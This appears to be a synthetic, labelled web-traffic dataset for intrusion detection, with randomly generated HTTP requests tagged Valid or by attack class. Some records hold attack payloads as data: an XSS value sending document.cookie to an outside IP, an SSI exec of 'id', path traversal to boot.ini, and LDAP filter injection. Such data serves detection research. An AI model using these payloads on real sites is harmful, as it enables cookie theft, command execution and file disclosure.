Warning: 236 www.kteDei.png "aaNzovzy59eaipao" 
X-Forwarded-For: 234.74.157.132
X-Serial-Number: 44944819
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16965
Start - Id: 37420
class: LdapInjection
GET /BZGQ.KhtpasscIexec5UNT/taraioe/naBeuaonT/MYqUtYv.yy_IJ/yyAkV0daxrR1XYhtpass8/c4eltarao/lEpoNasrhuoetd0kji/ydxgzypoO/af33S2huu17Az/t4.GxyylVbhbnxjB/_UK.bin?loa=30693259&on=fJKjj31HV5yP&Lj8dEI7cFN.=8945555633&tbssnrtVn=878%406gIzYs&bmoti1=iseRzm%401j&Y9ZMwLcV=pa6nnola%28&hl0digehhseE=raifp&he=51297796&SEAdSGR1=484918&hzhi6omgSr=u6%25like&cTcmle=Sl&es5f=66779697 HTTP/1.1
Host: 191.166.39.131
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.2, compress
Accept-Language: *
Cache-Control: min-fresh=413
Client-ip: 69.78.124.69
Cookie: enfipaaoe=541130;cofromDJURp9e=rueo2n22;ara9tysEe=icnsthtuimg0a;oztbodjgofI6e8l=)  (   |   (uraee=9et*)
Cookie2: $Version="53"
Date: Thu, 30 Aug 07 11:56:30 UTC
ETag: "B@@tQzgMaUoLt@gc"
Expect: 100-continue
From: eda9Oyew@bfisXrie.cz
If-Modified-Since: Sun, 20 Jun 04 07:31:00 GMT
If-Unmodified-Since: Sun, 18 Jul 04 15:08:58 UTC
If-Match: "Jamg5R21.ju0nuIYM"
If-None-Match: "6AwGYMdswmQr6476K"
If-Range: *
Max-Forwards: 559
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: aeo57j 1iate=ahmbRee
Authorization: Basic MWlJdTpuaG5zdQ==
Range: 747728-0693
Referer: /ohaeee/thzp/rdQe/aacwr/tneumrb.js
TE: gzip
Trailer: TE
User-Agent: nwcAx6 http://www.ocBt.it
UA-CPU: Sparc
UA-Disp: 952,5448,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 359x5733
Via: 3.0 250.141.36.247:02, 9.0 www.Ehse.html, 6.2 www.3e2lcbr.tiff
Transfer-Encoding: identity
Upgrade: uea1/2.1, 1cm/2.9, tdg/5.6
Warning: 901 www.bESpai.js "Nauhit1ocdsdt" "Fri, 11 Jul 08 05:17:07 CET"
X-Forwarded-For: 44.141.186.180
X-Serial-Number: 1007301637
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37420
Start - Id: 38191
class: LdapInjection
GET /ooYFLbXiQ@0y/8eeh6nAHytnh/orrune9s75totsgfmtn/a1Tj/rntqhedeoA2tRs/stenb/t9uq7Ppowyb-jmC/cs6kD2g4PeXVs5O/pNpgIcatx/Y1ueNJb.jpeg?oAx0mfohq=7boot.ini6%26Tn%27zrza+eq%7E&rwa10cpgsdb=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&nt9v=%5B+%27or%276nullua&oegn2ens=735&apehdude=aEtTniterpenkN&se=uxn0o3&xqat=10945512&acbifo3ntoa=rfotaOl&eoehrpnmik0R=tn&sEfienbr=r%3Bcs%3Fg%2Bants%3Acwl&a2t=401 HTTP/1.1
Host: www.yens.ch
Connection: eetgino
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 186.3.228.230
Cookie: kNprocessing-instructiontmpwtDbP=Ui n4
Cookie2: $Version="70"
Date: Tue, 27 Jun 06 13:57:33 CET
ETag: W/"cvMbx4sfux4.USQJj"
Expect: anoae=Rywdsuv
From: nethi@otsenrjp.biz
If-Modified-Since: Tue, 23 Mar 10 23:40:38 CET
If-Unmodified-Since: Wed, 04 Jun 08 21:23:40 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 9.1
Pragma: at='ca'
Proxy-Authorization: Digest nonce
Authorization: Basic SG51N2U6ZXNFbnJm
Range: -49,281-
Referer: http://ciog.cz/6qodi/ieoic/orRere/itaEjh7s.msf
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/6.4 (X11; U; Solaris 1.5; ne-ta; rv:5.0.5) Gecko/19756722
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5505x7135
Via: HTTP/6.6 www.hinr.js, 7.0 www.l1wia.jpeg
Transfer-Encoding: deflate
Upgrade: ntixr/4.9, Tjoh/5.9, isI4/3.2, nts/4.6
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 092315765
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38191
Start - Id: 45310
class: PathTransversal
GET /tsystemVNbpassthruJEOaupdateJ6F/IEnAtiSsi/ryia/r7xw1/biz92EWnNFCDwVs/waistrnAihfngopuliN/73wiii/iqMCaMrE4iu6c/drhedc3sxgr8g/BU9j0WKgjfromN.nsf?patseM=gnrs5t6t&ieeveytJt=nahlrsudeleteoU7e7yuiy&aoeei=leiD&enussvTEmnaf=h8K3Yl3Lo625&woeyo3hapIm=uO-phokolN&rrtq=ti9&uoa=se3L&Di=s HTTP/1.0
Host: www.hqAoodIud.uk
Connection: 7fbN5rk
Accept: application/*;q=0.9, application/zip, application/x-tar;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: tcfxgze-2seoh, ehdBa-lziaSrv;q=0.9, rceua-Re;q=0.0, iMe4f-ienqiwe
Cache-Control: no-store
Client-ip: 135.167.163.218
Cookie: elO=pkhv;-L_CAq_@=e:\winnt\boot.ini;atienwnr=53563
Cookie2: $Version="9"
Date: Wed, 07 Jan 04 24:40:44 GMT
Expect: tstprlNo=aasiiyp
From: EYChns@iihtspc.com
If-Modified-Since: Fri, 12 Feb 10 04:31:07 UTC
If-Unmodified-Since: Sun, 24 May 09 14:43:56 CET
If-Match: *
If-None-Match: "LDsJQqKWASZB4Qi3kFNE"
If-Range: Mon, 06 Oct 08 16:03:06 UTC
Max-Forwards: 683
MIME-Version: 6.8
Pragma: no-cache
Authorization: Digest username="radhng"
Range: 537-159353,-296
Referer: /eneluhii/lsoaVvni.gif
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/4.6 (Windows; U; WinNT 3.2; ir-ce; rv:3.6.3) Gecko/84981945
UA-CPU: MIPS
UA-Disp: 694,2760,32
UA-Color: color8
UA-Pixels: 4437x6193
Via: sogN/7.6 167.148.9.231:69825
Transfer-Encoding: compress
Upgrade: Opm/1.0, mhhmo/7.2
Warning: 500 www.H6un.shtml "oqowqnx9i" "Fri, 10 Oct 08 07:45:35 UTC"
X-Forwarded-For: 12.213.145.146
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45310
Start - Id: 5755
class: Valid
POST /RF9NL8hh-lsprocessing-instructionxmle/O9C0z4fjscriptn3.tiff? HTTP/1.1
Content-Length: 129
Content-Language: 8e,fidco,r
Content-Encoding: deflate
Content-Location: /mtcut3/tbnfeue/s4e1in6/2lgnoosR/tseeqo7e.cfm
Content-MD5: c2hyZWFac3p6YWF1c3RvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Feb 07 11:22:20 UTC
Last-Modified: Tue, 16 Aug 05 04:23:03 GMT
Host: www.ognthcJdH.gov
Connection: jetla
Accept: video/mpeg;q=0.2, text/xml, image/png;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: thOOiTo-Bdo;q=0.6, nuiPi1-T;q=0.4, qe-epSl, e-lXn0octo;q=0.3, sLa7xNyt-etyNi
Cache-Control: no-store
Client-ip: 158.72.225.225
Cookie: leofastr=2;ecsiueQ=46372984;9s1ehcihg6bl=64284;aEIOchsheieriab=n-J3PowfZ;8laseti=506
Cookie2: $Version="7"
Date: Wed, 25 Aug 04 21:04:25 GMT
ETag: "WXfWa7CFg7vCUIyp"
Expect: ia88=rnaasbas
From: Fsgo@SlB9asdh.it
If-Modified-Since: Wed, 03 Oct 07 08:06:27 UTC
If-Unmodified-Since: Thu, 17 Apr 08 18:22:13 UTC
If-Match: *
If-None-Match: "ctaG1YMIRBqNnCzjr6"
If-Range: Sat, 18 Jun 05 22:57:03 GMT
Max-Forwards: 427
MIME-Version: 3.5
Pragma: nt='iX'
Proxy-Authorization: seRi Rni3ct=uedaamar
Authorization: Basic aGhnZTowbmx5ZW1h
Range: 90839-562,-648284
Referer: /umldTssr/nfrtdaa.tiff
TE: deflate,trailers
Trailer: TE
User-Agent: Mozilla/7.0 (X11; U; Solaris 9.9; ts-vi; rv:0.7.8) Gecko/69137567
UA-CPU: 68000
UA-Disp: 6915,168,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2088x8163
Via: 8.7 www.o4fuH.htm, ih2ym/3.8 www.rIei0t.jpeg, FTP/8.9 www.seEeavm.jpeg
Transfer-Encoding: deflate
Upgrade: soi/5.7, trhldd/2.6
Warning: 089 www.oRtti.html:26745 "tmttce" 
X-Forwarded-For: 37.13.252.62
X-Serial-Number: 74000627821208
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

h3rnxppl=Deexaehq&ehwlYc=235155190&igicusos3=5&o8teb=Opiothhh5&e4en=d sptmgopR;oIE&cAmhd6buany=iPio0o7O&sezer=f84oxttoq0ede4foh

End - Id: 5755
Start - Id: 47459
class: XSS
GET /okgq-Q-/tN89I5/eeagF3zntoni/ponaoy/bwr7s6aieaataAau/feruxnrOsloynEeurt/nfsbTftiq8ws2/oi7PAyJ5ilL81b.shtml?soSEc=m&nrtanndaem=aw&gtttx=C%3Daee&6runinctNfnn=2stiMitbeuahina7&r4eamuaatsEam=at&snUe3=yX9x&NoSehEne=jtepassthruaN%26&DMAinY=odmp%3EhAii2shnf&MK=9DFNtCLGv9v&bnpaneoi47ets=%3Cbody+++++onload+++%3D+++%22+++++%5Bwindow.open%28%27http%3A%2F%2F15.218.84.254%2For.asmx%27%2Bdocument.cookie%29%3B%5D++%22++++%3E&WscriptqJENm5=78&es=nkqs HTTP/1.0
Host: 110.243.42.254
Connection: eoioseiE
Accept: */*;q=0.6
Accept-Charset: x-mac-korean;q=0.5, iso-10646-ucs-2, koi8;q=0.4, iso-10646-ucs-2, windows-1255;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: eelae-nufhw, sdplrqh-c;q=0.2, m-l, yhrlii-m
Cache-Control: no-cache
Client-ip: 146.143.28.253
Cookie: afHJGc=nasr8acp;jgsmhpinc=stegd;nrhn=yyz4RUVNzYE;ieome=de dwu1(in ;Stt6hh=816
Cookie2: $Version="073"
Date: Thu, 12 Apr 07 17:10:34 CET
ETag: W/"UCqG8sTrPrBsCcr7vUF"
Expect: 100-continue
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Sun, 09 May 04 22:25:54 UTC
If-Unmodified-Since: Sat, 27 Mar 04 19:39:19 UTC
If-Match: "dsqezla3Zlk5Dna"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest opaque="shnm"
Range: 9547-817639
Referer: /mthn41/rognTorx/ewsht/here1dy/a6yncide.mp3
TE: chunked;q=0.1,trailers
Trailer: From
User-Agent: oI2dAFI http://www.nnkvbcef.org
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4532x5831
Via: kaezOt/6.6 www.cBjh.jpeg
Transfer-Encoding: gzip
Upgrade: rshhh0/1.3
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47459
Start - Id: 18409
class: Valid
GET /nesnatoe0arre1rw/lfkNzraeae/j3w6KmEithjqeZx3l/@aRvbX8yGfrom/mFnlhMQ2/VFNbin2c6fr/XAeinoiee2aloltoto.css?Mc3oChua19E=ktbt&ali9brbanal=6&redhrtyflt0si=34887951&cbibnhwneo5=iGe_o6DzKroc&aorsodr=3267&ts=32670&rxs=4t%27sXch+nullstdyogeate7&njyry8754e0=uitbs&rl0reaail0a=aL HTTP/1.1
Host: 230.131.53.193
Connection: keep-alive
Accept: text/*;q=0.6, application/*;q=0.5, video/quicktime
Accept-Charset: x-mac-icelandic;q=0.0, x-mac-turkish, euc-tw
Accept-Encoding: compress, compress;q=0.4, compress
Accept-Language: 5j5ou-aOet8e47;q=0.9
Cache-Control: no-transform
Client-ip: 183.39.30.120
Cookie: oneiu=s(Ua5ue/v  nst]eT
Cookie2: $Version="5"
Date: Fri, 15 Aug 08 23:34:08 CET
ETag: W/"MgltMTz0K8OY2ncAsiKt"
Expect: eeic
From: 1hniea@u4rmt.it
If-Modified-Since: Thu, 14 Dec 06 01:50:27 CET
If-Unmodified-Since: Sat, 10 Jan 09 24:21:00 CET
If-Match: "3ylSXjEHkyAQe0LqLor9"
If-None-Match: *
If-Range: Sat, 08 Sep 07 21:32:30 GMT
Max-Forwards: 0622
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM cjNtZWFMb1Ntc2J5cmVxbkRkb3lwUkVlZXJydDV0Ym5kb3I2SHR1b2lld2Vv
Authorization: undiya xbalstms=ranInbch
Range: -442796,02-1422
Referer: /7eee/9he1id0/oodhae.mpeg
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: saHfuseuohpamAd
UA-CPU: 68000
UA-Disp: 882,683,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 342x6218
Via: 6.2 112.248.5.196, 3.4 www.eocrm.png, 8.4 www.trtt.jpeg
Transfer-Encoding: gzip
Upgrade: fr6/9.1, a7d/9.3, ieeyad/2.3, bel/9.8, 1ryi/9.2
Warning: 382 234.104.119.196 "nOJdiaeAxptcthqErre" 
X-Forwarded-For: 157.164.79.230
X-Serial-Number: 2956272403318008567
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18409
Start - Id: 39930
class: SSI
PUT /inocilvttaditc/ienLyodnesrrtEeiwn/c0n6EeBSnE/4AOVmEF/4C9Mi1GH2i5G81p.exe? HTTP/1.1
Content-Length: 175
Content-Language: aept
Content-Encoding: identity
Content-Location: http://id3s.uk/ekoyfc/iuita/m4hnnou/apamvapS/etice.nsf
Content-MD5: dHNpZXJVdHNvdWV2YWxzTg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Dec 04 24:22:32 CET
Last-Modified: Fri, 04 May 07 11:04:42 UTC
Host: 231.169.85.223
Connection: botOd7en
Accept: video/mpeg, audio/x-wav;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tl9-morOa, bcaxh-ayo4thtw;q=0.5, menbbtdu-f39h;q=0.3, oeyrmce-7nsr;q=0.4, sqvnLn-ettaet;q=0.5
Cache-Control: cnf='adr'
Client-ip: 225.90.180.135
Cookie: .H_0Kwindow.openIT=251;hM2ireeebe=t+v/nsT(bdivlehnS6;ahnwceoEpctoiy=oxVrX;documentqkrE_3HAU=te ymhavingdr
Cookie2: $Version="9"
Date: Sun, 18 Jan 09 16:21:13 GMT
ETag: "904lqZNeUrGwrPUmWLi1"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Wed, 16 Jun 04 07:25:43 GMT
If-Unmodified-Since: Wed, 18 Jan 06 04:00:11 UTC
If-Match: "I.3l53sXRzFW7pUa1G5"
If-None-Match: "G_YHPIWr5Epa5_ua"
If-Range: "MIApyNYKDy81AJ4Ryyd7"
Max-Forwards: 6680
MIME-Version: 6.0
Pragma: eyn2tl=de
Proxy-Authorization: prpre Olaoher9=mhser4gE
Authorization: NTLM c25lZm9hdTN3aWF1MGxkaGVhYnlxaGFVaWxjU3RldGc=
Range: 065804-4,-22740,4181-
Referer: /ebtuwnql/mgla.php3
TE: chunked
Trailer: User-Agent
User-Agent: plDrG4f http://www.IRlt.it
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 625x1975
Via: 9.5 186.157.93.138, 6.5 www.Bjspiig.jpeg, 4.9 165.179.225.214
Transfer-Encoding: hsehAt
Upgrade: rZos/0.7, seee/7.7, tpcri/7.2, yeGh/9.2, etshoj/4.1
Warning: 800 145.154.254.159 "waio" "Sat, 03 Feb 07 02:53:35 CET"
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4eeymdIa=57173366&eeFlH3wt=0y&w88hsoongths76=<!   #<!--   #exec     cmd="id"-->&aruofbtopefEt1r=arqutfidrZl3cy&rcp-0insertwn=agroLf&ugAe=660058&s4H=lk1dki6

End - Id: 39930
Start - Id: 7459
class: Valid
PUT /tBAdV9g/club/o4nkibtsrEcu/rgnEOaiueigsfet/hueCyERh0B0f8Bq/j6E/hmetaPK9EKYxyoptRI.sh? HTTP/1.1
Content-Length: 257
Content-Language: eAaoe1a,ia,itidl
Content-Encoding: identity
Content-Location: /dalrh/Svwo/oarn/mcce4/lrsahE.bin
Content-MD5: d2xjSHlsczJwZG53aGVvbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Jul 04 23:00:29 CET
Last-Modified: Sat, 08 Dec 07 17:48:00 UTC
Host: 233.49.209.173
Connection: keep-alive
Accept: application/*;q=0.7, image/*, text/*
Accept-Charset: x-mac-chinesesimp, iso-8859-5, iso-8859-2;q=0.7, cp-932, x-mac-arabic
Accept-Encoding: identity;q=0.7, gzip;q=0.8, identity;q=0.5
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 248.17.152.45
Cookie: ahs=seaotlib;uIltnTRnyre6e=uN6E-5JeXU
Cookie2: $Version="24"
Date: Sat, 28 Feb 04 16:28:06 UTC
ETag: W/"25JCBWzj64D0ix0rYOS"
Expect: 100-continue
From: haIOel@eOte.be
If-Modified-Since: Fri, 30 Apr 10 03:06:41 CET
If-Unmodified-Since: Sat, 17 Dec 05 15:15:19 CET
If-Match: "vpkTjAXaUkvQosmv1GJ"
If-None-Match: *
If-Range: Sat, 13 Feb 10 21:22:06 CET
Max-Forwards: 7
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM dDFyZGhPbGkzSG5udWFPdG9zdGk5b2VxZmhkckVvZW5lZGll
Authorization: Digest realm
Range: 95-162886,848657-426532
Referer: /wzio9a5/iiii5/bbond/aise.asp
TE: gzip
Trailer: Cache-Control
User-Agent: xajueSrle0giodknsah
UA-CPU: PowerPC
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7331x9166
Via: 6.3 www.atdidest.js
Transfer-Encoding: deflate
Upgrade: aelor4/7.1
Warning: 422 www.rinltnh.jpeg "aiAkn" 
X-Forwarded-For: 46.39.95.124
X-Serial-Number: 991189
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NcCrTnGDetc.phpK=x&ther1sLxey=ae ss&7vprocessing-instruction4=i-cao sCh&kwtoses=twitit&Lr=objectsd&u9Z8uesiWQ=920059&edsaiiaAlg=t-a3RL7U&cm7frdetote=tvekarecat=rotn&e3edngodoKrlc=nydi7xterme&sfdvdhnmeU=63&eorFTstylenop.=90144&30n4=8131&isrgs6racletE=65047

End - Id: 7459
Start - Id: 28527
class: Valid
GET /te/0cLi6/ee56eyrfxheS/LPFVaPFLlZ3/tBYBHD/iagteDVqi/v74/r_p9HKbQ.pl? HTTP/1.0
Host: www.o0oc1.ch
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: cp-932, cp-936;q=0.1, iso-8859-3
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 86.240.167.85
Cookie: t6y=pq cds;5nn8unita5naw=adit
Cookie2: $Version="202"
Date: Thu, 05 Aug 04 17:55:06 GMT
ETag: W/"RXt86@h_n_6zIZZ"
Expect: ojalicF
From: oSchO@nretCorwsa.st
If-Modified-Since: Sun, 22 Feb 09 06:17:58 GMT
If-Unmodified-Since: Sun, 02 Jan 05 03:15:17 CET
If-Match: "7GXCfdph6dmrRCXsqSdG"
If-None-Match: "tDuvsv39d.jq.XDT5GJf"
If-Range: Tue, 27 May 08 06:40:47 CET
Max-Forwards: 8
MIME-Version: 6.5
Pragma: arlocE='v9teef'
Proxy-Authorization: rfNki eds412id=t8vE
Authorization: NTLM bGViZ3JjeXV5VmVldG83cWUxZWVzN2h0SHN0Z3N0aGRzSXNlcnF0
Range: 998964-,7263-,5954-1520
Referer: http://fSXal.fr/ntthtyw/tthcmMea/orynh/adtehT/ns6q.php
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.6 (compatible; aglwora; Linux i386; haeae)
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x668
Via: 3.8 www.J1m8.tiff
Transfer-Encoding: lRnjeN
Upgrade: ssc6/7.2
Warning: 648 www.ttih.html "ord3rsoanoeqih" "Mon, 01 Jan 07 08:14:14 UTC"
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 672108482852
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28527
Start - Id: 9448
class: Valid
GET /mZAW6RTGSt78S32O/wwgetF@/tm1eaEhiiaAp6olaje/thtuIhdDTe/emr/stylefzo3etcX0S5/eegb6frssaSastRe8he/tzROrnc/a1uikQvkA/3.tmpTxwp-/w3-c/aRhealet.gif?dapetteam=a&aer2nef=slsy HTTP/1.1
Host: www.rrCsfar.cz:72
Connection: dera
Accept: video/*;q=0.3, video/*
Accept-Charset: iso-8859-8, x-mac-ce;q=0.7, iso-8859-15;q=0.2
Accept-Encoding: deflate;q=0.5
Accept-Language: *
Cache-Control: max-age=935
Client-ip: 141.214.43.13
Cookie: zbrqnny3lab=sir$|
Cookie2: $Version="00"
Date: Mon, 07 Jun 04 15:47:04 GMT
ETag: W/"@8QA_vWMBay-vYqC"
Expect: 100-continue
From: ieue@hoegnHqytl.be
If-Modified-Since: Thu, 19 Jan 06 10:18:20 GMT
If-Unmodified-Since: Wed, 27 Aug 08 22:19:14 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 24 Mar 08 15:52:24 GMT
Max-Forwards: 01
MIME-Version: 4.1
Pragma: adtt=rn
Proxy-Authorization: uide iwlucnv=bfge1or
Authorization: Digest username="edfr"
Range: -361938
Referer: /4orrb/bsooaS/9ht9.swf
TE: deflate;q=0.7,chunked,trailers
Trailer: Date
User-Agent: Mozilla/7.5 (X11; U; Open BSD i386 2.5; Su-8c; rv:5.6.8) Gecko/16135388
UA-CPU: Sparc
UA-Disp: 269,5048,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 383x664
Via: seor/7.7 12.234.223.248, FTP/6.5 93.214.28.143
Transfer-Encoding: gzip
Upgrade: EtpS/2.8, somd8/1.4, hltar/3.4, A7rOwy/8.2, edis/8.2
Warning: 339 144.218.59.163 "gnvogsawxtUq" 
X-Forwarded-For: 24.185.22.139
X-Serial-Number: 637220700897
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9448
Start - Id: 4892
class: Valid
POST /d3-UTSwLU@/yilagat/tforme9txyH0J/geSsxrL3e/vifD3r/iitpn3Y/hX5@85miC78r35mJGGb.js? HTTP/1.1
Content-Length: 58
Content-Language: pef,dorc,u
Content-Encoding: deflate
Content-Location: /ietrir/t4t9/isenEne/t8soger.php3
Content-MD5: b25uYWN0cG9nYTRlamVlZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Nov 06 05:03:54 CET
Last-Modified: Mon, 11 Sep 06 15:04:10 CET
Host: 90.144.160.100:80
Connection: 3xebee
Accept: text/html, text/*, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ee-1
Cache-Control: max-stale=6
Client-ip: 225.111.135.85
Cookie: Tteoh4lnu4=06548741;nshaeaIeEoet9nh=noCearto;rn=7654257
Cookie2: $Version="471"
Date: Sun, 14 Dec 08 17:54:53 UTC
ETag: W/"M7ZgvO50v8rk7fRj374"
Expect: 3ohexet
From: itds3@bta1toaaio.be
If-Modified-Since: Sat, 15 Aug 09 23:12:30 CET
If-Unmodified-Since: Fri, 04 Dec 09 23:22:35 UTC
If-Match: *
If-None-Match: "xeQoDg7K5epoeauh6YWg"
If-Range: Fri, 12 Jun 09 04:55:50 UTC
Max-Forwards: 4658
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM eWliNGVlbHVPU211c3p0QzRIb2lzbnJ0aWhpVWU4ZGNlZWNuZXM5ZXl0ZA==
Authorization: Basic ZWV0YWR0emE6ZmFTY1Nzc28=
Range: 700323-3,56039-78431,91-43
Referer: http://www.aue9h.fr/nee2naOw/o46u/tfpajoae/dect.php3
TE: trailers
Trailer: Referer
User-Agent: tnhr/6.1.0
UA-CPU: x86
UA-Disp: 085,1074,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1385x252
Via: HTTP/2.5 www.ficrHr.gif, 3.1 www.loane.tiff, HTTP/1.8 www.oa8Lsdc.jpg
Transfer-Encoding: deflate
Upgrade: wsry/3.9, n3Lf/9.4, otoco/2.2
Warning: 663 240.146.98.193 "qE3letoussnxetl" "Wed, 16 Sep 09 19:44:00 UTC"
X-Forwarded-For: 85.213.238.100
X-Serial-Number: 625096435870938677
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

es=>&mrrya=4&ecP=%dropm3E?7a&nN=2i&eteH=boniesee7ezc

End - Id: 4892
Start - Id: 36202
class: PathTransversal
POST /bIboot.iniVWMOZiSlink/J63Y1EKqgx1Pc/aVlK52OhP/ndhlnl/adQI4daB.jsp? HTTP/1.0
Content-Length: 21
Content-Language: gwnnin,jiiu
Content-Encoding: compress
Content-MD5: ZHJ0RGw2aXltbW5lZnRMYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Aug 07 01:20:09 GMT
Host: 98.113.110.31
Connection: n1ltR
Accept: audio/x-wav, application/zip;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.1, identity;q=0.3, identity;q=0.6
Accept-Language: E-hEo;q=0.1, et50etT-etea, sinn-learetce
Cache-Control: only-if-cached
Cookie: eeam=eCLzP;e5ecmr=../../../../../../../../../usr/yo.bat;iqw=8F394y
Cookie2: $Version="525"
Date: Wed, 30 Mar 05 14:24:57 GMT
If-Unmodified-Since: Tue, 08 Aug 06 11:45:03 GMT
If-Range: Fri, 20 Feb 09 07:39:12 UTC
Max-Forwards: 5272
Range: 09663-
Referer: http://www.Neuhkeri.fr/2gt6u/adfo.conf
User-Agent: 7teeetff64oenoj
UA-Disp: 3680,078,16
Upgrade: hismrw/5.0, e9o/5.1, sqeomt/0.6
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

h2ensi=ex&oj=hR6ynaKg

End - Id: 36202
Start - Id: 24292
class: Valid
GET /seo6ocfIpme9/thnseohsIIsttTterma/oOshcd0o/FXustylejJ0xRnGMw6/mlnndct/3EUM7m7cJDAyuXxD/nReRNWfBJC26XCl7.swf?Oees=dfiqeyl&asieenz=7qOIK%40NX1tmo&aTr97A9Bps=e9s&tdoa3=ntt80&s2hnoi1e=nAbaxxtgi3I7turva7&haesbrxone=4tsh&ie=363839074&EAN@AlsJselecto=hEJtu8D+lEpa&Sonnusstn4I=uECR-fqj&yI4tt6=yo1bo&tirlea=bowahuorItse&sg=uljth0ede&yue6h=enYltYrQ%40TH HTTP/1.1
Host: 177.73.202.125
Connection: close
Accept: image/*, image/jpeg;q=0.8, application/zip
Accept-Charset: *
Accept-Encoding: identity, compress, deflate;q=0.2, gzip
Accept-Language: yeeei-UrahS;q=0.3, a-so;q=0.3, R6eh-ORNsdddn
Cache-Control: tBjzr=bee
Client-ip: 123.201.157.28
Cookie: nJYgowmpeeode=eee9eHgtynhbe
Cookie2: $Version="488"
Date: Wed, 22 Oct 08 02:27:27 GMT
ETag: "9MdykHut-67CUwu7k.9"
Expect: eytuu=pp3coe;wntjenoo=omnm
From: somsctd@slielEozga.ch
If-Modified-Since: Wed, 04 Jul 07 22:15:22 GMT
If-Unmodified-Since: Mon, 26 Apr 04 02:58:03 GMT
If-Match: *
If-None-Match: "QSx_NiG9YHgFVx3Bv6"
If-Range: "t1BFL3-HGgVeBjgbceq0"
Max-Forwards: 71
MIME-Version: 2.0
Pragma: astlot=if
Proxy-Authorization: Digest qop=auth-int
Authorization: jdu5ex rlOecogk=plDrpoet
Range: -1827
Referer: http://ajAd.gov/nIopgIhm/LSuwine/fupnna.asp
TE: gzip,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 4.7; ey-ed; rv:1.3.0) Gecko/52347655
UA-CPU: 68000
UA-Disp: 298,2498,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 982x566
Via: 0.7 53.221.71.182:0, FTP/0.8 92.149.34.27, FTP/8.7 212.220.28.53
Transfer-Encoding: identity
Upgrade: 8hrah/0.7, 0smeTf/8.6, bnhw/9.3, jKiNhE/8.3, dkaoOi/9.1
